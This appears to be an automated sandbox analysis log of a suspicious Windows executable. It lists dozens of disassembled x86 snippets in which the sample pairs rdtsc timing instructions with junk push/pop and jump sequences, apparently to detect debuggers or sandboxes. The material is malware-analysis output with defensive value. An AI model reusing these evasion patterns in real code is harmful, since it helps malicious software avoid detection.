Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11685D9 second address: 11685DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11685DD second address: 11685E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11685E3 second address: 116864C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F2468CF6A40h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F2468CF6A38h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 jmp 00007F2468CF6A46h 0x0000002d push 00000000h 0x0000002f mov esi, edi 0x00000031 push 00000000h 0x00000033 jo 00007F2468CF6A36h 0x00000039 xchg eax, ebx 0x0000003a push esi 0x0000003b push edi 0x0000003c pushad 0x0000003d popad 0x0000003e pop edi 0x0000003f pop esi 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116864C second address: 1168650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1168650 second address: 116865A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2468CF6A36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116865A second address: 1168660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1169B4F second address: 1169B78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F2468CF6A36h 0x00000009 jmp 00007F2468CF6A46h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1168E9F second address: 1168EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1169B78 second address: 1169B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop edx 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D267Fh], ebx 0x00000011 push 00000000h 0x00000013 add esi, 1B71A0C3h 0x00000019 push 00000000h 0x0000001b stc 0x0000001c push eax 0x0000001d jl 00007F2468CF6A44h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1169B9F second address: 1169BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116AF9E second address: 116AFA8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2468CF6A36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116AFA8 second address: 116AFAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116AFAD second address: 116AFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2468CF6A48h 0x0000000f nop 0x00000010 sub dword ptr [ebp+122D1C33h], eax 0x00000016 mov si, di 0x00000019 push 00000000h 0x0000001b mov edi, 3E40D3EEh 0x00000020 push 00000000h 0x00000022 or dword ptr [ebp+122D1AD9h], eax 0x00000028 push eax 0x00000029 pushad 0x0000002a jmp 00007F2468CF6A3Bh 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116E17F second address: 116E186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116F27A second address: 116F284 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2468CF6A3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1170260 second address: 1170264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1170264 second address: 117026D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 117026D second address: 11702C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 mov edi, dword ptr [ebp+122D285Bh] 0x0000000d jno 00007F2468994E97h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F2468994E98h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f jg 00007F2468994E9Ch 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 jp 00007F2468994E9Bh 0x0000003e sub di, C770h 0x00000043 pop edi 0x00000044 xchg eax, esi 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11702C0 second address: 11702C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11702C4 second address: 11702DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994EA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116B81F second address: 116B84F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2468CF6A48h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 ja 00007F2468CF6A36h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116B84F second address: 116B863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2468994EA0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1175B03 second address: 1175B16 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2468CF6A36h 0x00000008 js 00007F2468CF6A36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 112DE37 second address: 112DE51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994EA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 112DE51 second address: 112DE57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 112DE57 second address: 112DE76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994EA6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116E37A second address: 116E380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116E380 second address: 116E384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116E48C second address: 116E490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116E490 second address: 116E4A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994E9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116E4A0 second address: 116E4AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2468CF6A3Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116E4AF second address: 116E4D9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2468994E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F2468994EA9h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1176341 second address: 1176345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 117B867 second address: 117B86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 117B86D second address: 117B8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D1994h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F2468CF6A38h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov dword ptr [ebp+122DB426h], edx 0x00000031 mov ebx, 57CAFA33h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007F2468CF6A38h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 jng 00007F2468CF6A39h 0x00000058 movsx edi, bx 0x0000005b push esi 0x0000005c pop edi 0x0000005d xchg eax, esi 0x0000005e push esi 0x0000005f push esi 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 117B8E0 second address: 117B8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F2468994E98h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 117F865 second address: 117F8A8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2468CF6A36h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007F2468CF6A49h 0x00000014 jmp 00007F2468CF6A47h 0x00000019 pop edi 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 117F8A8 second address: 117F8B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 117BA6C second address: 117BA8B instructions: 0x00000000 rdtsc 0x00000002 je 00007F2468CF6A36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F2468CF6A3Bh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 117CC39 second address: 117CC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 117CC3D second address: 117CC57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 117CC57 second address: 117CC72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2468994EA7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11793DA second address: 11793F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2468CF6A3Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11794A6 second address: 11794AB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 117DB9B second address: 117DBAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1181F47 second address: 1181F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1180124 second address: 1180131 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1181F4B second address: 1181F6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994EA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1181168 second address: 1181176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1181176 second address: 118117A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1181279 second address: 118127F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11821E7 second address: 11821EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1184691 second address: 1184695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1191A14 second address: 1191A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1191A18 second address: 1191A1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1196B60 second address: 1196B6A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2468994E9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1196C4C second address: 1196C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2468CF6A36h 0x0000000a popad 0x0000000b pop esi 0x0000000c mov eax, dword ptr [eax] 0x0000000e jo 00007F2468CF6A40h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 119AF47 second address: 119AF58 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pushad 0x00000007 jnl 00007F2468994E96h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 119B387 second address: 119B38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 119B4C5 second address: 119B4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 119B4CB second address: 119B4CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 119B9AB second address: 119B9B0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 119E714 second address: 119E71B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A3C59 second address: 11A3C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F2468994E96h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A3C68 second address: 11A3C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A2EE3 second address: 11A2EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A2EE9 second address: 11A2EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A2EED second address: 11A2EF3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A3011 second address: 11A3032 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 ja 00007F2468CF6A36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2468CF6A41h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A3032 second address: 11A3038 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A3038 second address: 11A3041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A3041 second address: 11A304B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A304B second address: 11A3051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A3051 second address: 11A308B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F2468994EA7h 0x0000000c jmp 00007F2468994EA8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A308B second address: 11A308F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A26A8 second address: 11A26B4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2468994E96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A26B4 second address: 11A26B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A336A second address: 11A3372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A361E second address: 11A364D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2468CF6A45h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2468CF6A42h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A364D second address: 11A3664 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2468994E96h 0x00000008 jbe 00007F2468994E96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A3664 second address: 11A3694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jng 00007F2468CF6A36h 0x0000000e jmp 00007F2468CF6A3Dh 0x00000013 je 00007F2468CF6A36h 0x00000019 popad 0x0000001a jc 00007F2468CF6A42h 0x00000020 jg 00007F2468CF6A36h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A394B second address: 11A395C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2468994E9Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A7E25 second address: 11A7E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A8153 second address: 11A8184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007F2468994E9Eh 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jnp 00007F2468994E96h 0x00000015 jmp 00007F2468994E9Fh 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A8184 second address: 11A818E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2468CF6A36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A818E second address: 11A8194 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A8448 second address: 11A844E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
